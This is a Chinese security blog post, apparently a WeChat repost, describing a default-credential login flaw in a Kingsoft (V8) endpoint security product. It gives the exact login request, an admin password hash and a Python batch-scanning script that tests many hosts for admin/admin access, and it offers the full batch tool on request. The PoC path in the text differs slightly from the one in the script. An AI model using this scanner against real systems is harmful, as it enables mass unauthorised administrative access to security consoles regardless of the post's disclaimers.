免责声明:
由于传播、利用此文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任何责任。切勿用于未授权测试!
某师傅给了我一个poc,是某安全终端的一个文件上传漏洞。本来想尝试复现一下写一个批量检测脚本,但是却以失败告终。碰巧遇见了安装后的默认账号密码,所以根据弱密码写出来批量检测脚本。
环境下载:
随便找个网站下载
复现过程:
下载完成后,直接傻瓜式安装,会直接打开一个txt文档,存放了默认密码
在登录的时候使用默认密码登录并抓包分析,根据反复观察和尝试可以知道需要post一段json格式的代码到特定的路径,若返回包状态码为200并且有关键字段userSession即可判断漏洞存在
Poc:
POST /inter/ajax.php?cmd=get_user_login_cm
{"get_user_login_cmd":{"name":"admin","password":"21232f297a57a5a743894a0e4a801fc3"}}
脚本主要代码:
def poc(url):
target = url+"/inter/ajax.php?cmd=get_user_login_cmd"
data = json.dumps({"get_user_login_cmd":{"name":"admin","password":"21232f297a57a5a743894a0e4a801fc3"}})
try:
r = requests.post(url=target,data=data,verify=False,timeout=8)
if r.status_code==200 and "userSession" in r.text:
print("-"*50)
print(url+" 漏洞存在!")
print("默认账号密码为admin/admin")
print("-"*50)
print("n")
else:
print("-"*50)
print(url+" 漏洞不存在!")
print("-"*50)
print("n")
except:
print("请求失败!")
利用截图:
后台回复:金山V8 即可获取脚本,支持批量检测!
优质公众号推荐:
本文始发于微信公众号(Fight Tigers Team):金山某系统老漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论